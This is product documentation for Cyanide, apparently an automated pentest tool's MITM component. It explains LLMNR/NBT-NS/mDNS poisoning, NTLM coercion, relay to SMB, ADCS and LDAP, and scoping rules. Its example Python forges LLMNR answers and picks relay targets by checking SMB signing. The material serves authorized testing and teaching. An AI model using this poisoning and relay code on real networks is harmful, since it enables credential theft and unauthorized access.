
Cyanide

Cyanide is H3's tool to facilitate and correlate man-in-the-middle (MITM) attacks and credential relays.

Cyanide utilizes opportunistic network protocol poisoning techniques and active coercion techniques to solicit a device to connect to NodeZero with authentication material. If MITM relay has been enabled for the pentest, Cyanide will attempt to relay authentication material to vulnerable target services and applications within the scope of the pentest.

Terminology

MITM Credential Relay attacks typically involve two hosts within the target network. H3 uses the terms "Source" and "Target" to differentiate these two hosts and their associated weaknesses and misconfigurations that enable a successful MITM attack.

  • Source - The host/user that initiates a connection and authentication session to NodeZero's relay server. Typically, the source authentication material will provide a username and possibly the path to a requested resource (e.g. SMB share, SQL database, etc.)
    • Source Weakness - the poisoning or coercion weakness that enabled or caused the source host to connect to NodeZero's relay server.
  • Target - The host to which NodeZero will relay the authentication material for exploitation.
    • Target Weakness - the weakness on the target host that enables Cyanide to relay credentials successfully and gain unauthorized access.

Purpose

During a pentest, NodeZero has to be able to accurately correlate the source of discovered credentials and track where they are being utilized to access network resources. Additionally, NodeZero needs to accurately determine which weaknesses were utilized in an attack chain. Cyanide's primary purpose is to make these correlations for MITM attacks, and capture authentication material for use or hash-cracking. Cyanide answers the questions:

  • Who
    • The user, machine or service account the captured authentication material represents.
  • What
    • The attack method used to cause the source host/user to connect to NodeZero:
      • Poisoning (LLMNR, NBT-NS, MDNS)
      • Coercion (PetitPotam, ShadowCoerce, PrinterBug, etc.)
    • The resource requested by the source user (e.g. SMB share, SQL database, etc.)
  • Where
    • The source host of the authentication material (i.e. Where the connection came from).
    • Where were the credentials utilized (i.e. the target service/host of the relay attack).
  • When
    • The date/timestamp of each event will be available:
      • When the host was poisoned
      • When the hash was captured
      • When a relay attack happened
  • Why
    • With the combined data, Cyanide can tell why this attack happened and why it was successful.

System Breakdown

Currently the Cyanide system consists of 4 distinct parts:

  1. Cyanide Message Pump
    • Responsible for correlating source and target information and providing collected data to NodeZero
  2. Responder
    • Responsible for broadcast protocol poisoning
  3. Intimidator
    • Responsible for coercion attacks
  4. Impacket's ntlmrelayx
    • Responsible for handling inbound SMB and HTTP connections and relaying authentication material to vulnerable targets

The Cyanide Message Pump

The main cyanide process, or message pump, processes incoming messages from the other 3 components of the Cyanide system and takes appropriate action correlating source and target information and populating a database that NodeZero can utilize to understand what MITM interactions are occurring and what new authentication material is available for the pentest.

Responder

Responder is an LLMNR, NBT-NS, and mDNS poisoner. It will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: Archived Microsoft KB). By default, the tool will only answer File Server Service requests (suffix <20>), which correspond to SMB.

If Responder poisons a source host via one of these broadcast protocols, the source host will connect back to NodeZero using whatever protocol the original name request was for (e.g. SMB, RDP, MSSQL, etc.), and the matching Responder or ntlmrelayx server accepts the connection.

  • If the protocol is NOT SMB or HTTP, Responder will simply capture the credential and inform Cyanide of the results. Cyanide will then report this data back to NodeZero's ephemeral cloud architecture and attempt to re-use or crack the captured credential material.
  • If the protocol IS SMB or HTTP, ntlmrelayx SMB and HTTP servers will handle it appropriately - either relaying it to a vulnerable service or dumping the credential for cracking.

  • Poisoners

    • LLMNR
      • LLMNR stands for Link-Local Multicast Name Resolution. LLMNR is based on the DNS message format and enables computers on the same local link to resolve each other's names without a DNS server. Queries are sent to the link-local multicast group (224.0.0.252 for IPv4), but replies are unicast, so only the device that sent the request sees the answer, including a poisoned one.
      • Server port UDP/5355
    • NBTNS
      • NBT-NS stands for NetBIOS over TCP/IP Name Service, usually referred to by the name of the underlying application programming interface, NetBIOS. NBT-NS is used similarly to LLMNR, except that it identifies hosts by their NetBIOS name and can ask the receiving machine to disclose and return its current set of NetBIOS names. NBT-NS can use broadcast, unicast, or multicast.
      • UDP/137 (name service)
      • UDP/138 (datagram service)
    • MDNS
      • mDNS stands for Multicast Domain Name System. mDNS replies are sent over multicast so that every host on the link sees them and keeps its local mDNS cache up to date.
      • UDP/5353
    • Servers
      • MSSQL
        • TCP/1433
        • UDP/1434
      • RDP
        • TCP/3389
      • Kerberos
        • TCP/88
      • FTP
        • TCP/21
      • POP
        • TCP/110
      • SMTP
        • TCP/25
        • TCP/587
      • IMAP
        • TCP/143
      • HTTPS
        • TCP/443
      • LDAP
        • TCP/389
        • UDP/389
      • DCERPC
        • TCP/135
      • WINRM
        • TCP/5985
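As an added illustration of the LLMNR exchange Responder abuses (this is example code written for this page, not Responder's or H3's code): the victim's resolver multicasts a DNS-format query, and a poisoner on the same link answers with its own address under the same transaction ID, which the resolver accepts because nothing in LLMNR authenticates the responder. The transaction ID, the queried name and the addresses are constructed sample values; a real poisoner binds UDP/5355 joined to 224.0.0.252 and sends its reply unicast to the asker.

```python
import struct

LLMNR_PORT = 5355               # UDP port listed above
LLMNR_MCAST_V4 = "224.0.0.252"  # link-local multicast group queries go to (RFC 4795)
QR_FLAG = 0x8000                # DNS/LLMNR header bit: 0 = query, 1 = response


def encode_name(name):
    """DNS-style wire name: length-prefixed labels, zero terminator."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def decode_name(buf, off):
    """Inverse of encode_name; returns (name, offset_after_name)."""
    labels = []
    while buf[off] != 0:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1


def build_query(txid, name, qtype=1):
    """Victim side: a one-question LLMNR query (QTYPE 1 = A record, class IN)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(pkt):
    """Poisoner side: pull the transaction ID and question out of a captured query."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & QR_FLAG or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, name, qtype, qclass


def build_poisoned_answer(query, spoof_ip, ttl=30):
    """Poisoner side: answer whatever name was asked for with our own IPv4 address.

    Same transaction ID as the query, QR=1, the question echoed back, then one
    A record pointing at the poisoner.
    """
    txid, name, qtype, qclass = parse_query(query)
    header = struct.pack("!HHHHHH", txid, QR_FLAG, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    rdata = bytes(int(o) for o in spoof_ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_answer(pkt):
    """Victim side: what the resolver extracts from the reply -> (txid, name, ip)."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & QR_FLAG or ancount < 1:
        raise ValueError("not an LLMNR response")
    _, off = decode_name(pkt, 12)          # skip the echoed question name
    off += 4                               # QTYPE + QCLASS
    name, off = decode_name(pkt, off)
    _, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    return txid, name, ".".join(str(b) for b in pkt[off:off + rdlen])


def simulate_poisoning(victim_name, poisoner_ip, txid=0x1337):
    """Constructed end-to-end exchange: a mistyped share name, answered by the poisoner."""
    query = build_query(txid, victim_name)
    reply = build_poisoned_answer(query, poisoner_ip)
    return parse_answer(reply)


if __name__ == "__main__":
    print(simulate_poisoning("fileshare01", "192.168.0.50"))
```

The victim ends up with the poisoner's address for a name that never existed, and its next step (an SMB connect to `\\fileshare01`) carries NTLM authentication material to the poisoner, which is the hand-off to the relay server described in the next sections.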

Expanded vs. Limited Poisoning

NodeZero's Attack Configuration options have 2 options that control the behavior of Responder:

  • Expanded LLMNR and NetBIOS poisoning
    • Responder will sniff all available traffic regardless of scope.
    • In "Expanded" mode, relay sources from outside the pentest's configured scope will NOT be targeted for any other attacks; they are only used to capture/relay credential material.
  • Limited LLMNR and NetBIOS poisoning
    • Responder is limited to the scope provided during the configuration of the pentest. If both options are selected, the Limited option will override the Expanded option.

Where does it work?

Responder works by answering broadcast and multicast name queries, and those packets do not cross routers. Poisoning therefore only works within NodeZero's own subnet (its broadcast domain); hosts on other in-scope subnets cannot be poisoned, although they can still be targeted by coercion and relay attacks if they fall within the pentest scope (see Scoping Scenarios below).

Intimidator

Intimidator is H3's framework for integrating NTLM coercion techniques with Cyanide. Intimidator provides a quick plug-and-play capability to facilitate the inclusion of new coercion techniques and open source tools quickly into NodeZero. Cyanide communicates with Intimidator over a duplexed IPC -- allowing the two processes to coordinate coercion and relay attacks effectively.

Impacket's NTLMRelayx

Cyanide utilizes a modified version of Impacket's ntlmrelayx as the base for its relay server.

When a source host connects and provides authentication material to ntlmrelayx's SMB or HTTP server, it saves the NTLMv2 challenge/response (the "NTLMv2 hash") for cracking and relays the authentication session to a high-value service within the scope of the pentest that is vulnerable to NTLM relay. Possible targets include:

  • SMB servers with SMB signing disabled: if Cyanide is able to log into the server with the relayed session, it will attempt to dump local credentials.
  • ADCS servers with the ESC8 misconfiguration (NTLM relay to the HTTP-based certificate enrollment endpoints).
  • LDAP servers with LDAP signing disabled.
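The first relay target above is selected by inspecting SMB signing, and the distinction that matters is "required" versus merely "enabled". Added example, not Cyanide's or Impacket's code: a parser for the SMB2 NEGOTIATE response (MS-SMB2 section 2.2.4) that reports the server's SecurityMode and whether the host is a relay candidate. The packet bytes are constructed inline by `make_negotiate_response`, a helper of this example rather than a real capture, so it runs offline; with a live TCP/445 socket you would feed the parser the bytes that follow the 4-byte NetBIOS session header.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on every server response
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002


def parse_negotiate_response(pkt):
    """Decode the relay-relevant fields of an SMB2 NEGOTIATE response.

    Layout: 64-byte SMB2 header, then StructureSize(2) SecurityMode(2)
    DialectRevision(2) ... All SMB2 integers are little-endian.
    """
    if len(pkt) < 70 or pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    hdr_size, _credit_charge, status, command, _credits, flags = struct.unpack_from("<HHIHHI", pkt, 4)
    if hdr_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not an SMB2 NEGOTIATE response")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % struct_size)
    return {
        "status": status,
        "dialect": dialect,
        "security_mode": security_mode,
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def is_relay_candidate(pkt):
    """True when the server does not *require* signing.

    'Signing enabled' alone (the Windows default on non-DC servers) does not
    stop relay: the relayed session simply proceeds without signing.
    """
    return not parse_negotiate_response(pkt)["signing_required"]


def make_negotiate_response(security_mode, dialect=0x0311):
    """Constructed sample packet so the example runs offline (helper of this
    example, not a real capture). Only the fields the parser reads are meaningful."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ",
        64,                          # StructureSize
        0,                           # CreditCharge
        0,                           # Status = STATUS_SUCCESS
        SMB2_NEGOTIATE,              # Command
        1,                           # CreditResponse
        SMB2_FLAGS_SERVER_TO_REDIR,  # Flags
        0, 0, 0, 0, 0,               # NextCommand, MessageId, Reserved, TreeId, SessionId
    ) + b"\x00" * 16                 # Signature
    body = struct.pack("<HHH", 65, security_mode, dialect) + b"\x00" * 59  # rest of the fixed body
    return header + body


if __name__ == "__main__":
    for mode in (SMB2_NEGOTIATE_SIGNING_ENABLED,
                 SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED):
        print(hex(mode), "relay candidate:", is_relay_candidate(make_negotiate_response(mode)))
```

A SecurityMode of 0x0001 (enabled, not required) is the value that makes an SMB host a relay target in the list above; 0x0003 closes that avenue, which is why domain controllers, where signing is required by default, are usually not on it.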

Scoping Scenarios

The scenarios and examples below review Cyanide's behavior when the "Limited LLMNR and NetBIOS poisoning" option is configured for the pentest.

Scenario 1

If no scope is specified, or if the specified scope contains the subnet of the NodeZero host, Cyanide's poisoning scope defaults to the full subnet of the NodeZero host.

Example 1

NodeZero host subnet: 192.168.0.0/24
Scope: Auto-Expand
Result: Cyanide will get a scope of 192.168.0.0/24 because no scope was specified and poisoning can only happen within the network of NodeZero. Relaying will occur against high-value targets that are discovered. Coercion attempts will be made against high-value targets within the pentest scope.

Example 2

NodeZero host subnet: 192.168.0.0/24
Scope: 172.16.100.0/24, 10.0.0.0/16, 192.168.0.0/24
Result: Cyanide will get a scope of 192.168.0.0/24 because the specified scope contains the subnet of the NodeZero host. Relaying and coercion will occur against high-value targets that are within the scope specified.

Scenario 2

If the specified scope contains only a portion of the NodeZero host's subnet, Cyanide will use that portion as its poisoning scope.

Example

NodeZero host subnet: 192.168.0.0/24
Scope: 172.16.100.0/24, 10.0.0.0/16, **192.168.0.0/30**
Result: Cyanide will only poison hosts within the 192.168.0.0/30 subnet because it falls within the NodeZero host's subnet. Relaying and coercion will occur against high-value targets that are within the scope specified.
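Added example, not H3's implementation: the scoping rules from the Expanded vs. Limited Poisoning section and the three examples above, reconstructed as a single function on top of Python's ipaddress module so they can be checked against the documented cases. Two points are assumptions drawn from the text rather than documented behavior: that several scope entries inside the NodeZero host's subnet are all poisoned, and that a scope which neither contains nor lies within that subnet leaves nothing to poison (an empty list).

```python
import ipaddress


def poisoning_scope(host_subnet, scope, expanded=False, limited=True):
    """Return the subnets Responder may poison (as strings), or None when unrestricted.

    Reconstruction of the documented rules (not H3's code):
      * Expanded without Limited            -> None: sniff everything, scope does not
                                               constrain poisoning
      * Limited (overrides Expanded if both are selected):
          - no scope                         -> full NodeZero host subnet
          - an entry contains the host subnet-> full NodeZero host subnet
          - entries inside the host subnet   -> only those entries
          - nothing overlaps the host subnet -> [] (assumption, see lead-in)
    Relay and coercion targets are governed by the full pentest scope, not by
    this value.
    """
    host_net = ipaddress.ip_network(host_subnet, strict=False)
    if expanded and not limited:
        return None
    entries = [ipaddress.ip_network(s, strict=False) for s in scope]
    if not entries or any(host_net.subnet_of(e) for e in entries):
        return [str(host_net)]
    inner = {e for e in entries if e.subnet_of(host_net)}
    return [str(n) for n in sorted(inner, key=lambda n: (int(n.network_address), n.prefixlen))]


if __name__ == "__main__":
    host = "192.168.0.0/24"
    print("Example 1:", poisoning_scope(host, []))
    print("Example 2:", poisoning_scope(host, ["172.16.100.0/24", "10.0.0.0/16", "192.168.0.0/24"]))
    print("Scenario 2:", poisoning_scope(host, ["172.16.100.0/24", "10.0.0.0/16", "192.168.0.0/30"]))
    print("Expanded only:", poisoning_scope(host, ["10.0.0.0/8"], expanded=True, limited=False))
```

Single hosts in the scope list (e.g. `192.168.0.10`) are handled as /32 networks by `ip_network`, so a scope listing individual addresses inside the NodeZero subnet yields exactly those addresses as the poisoning scope.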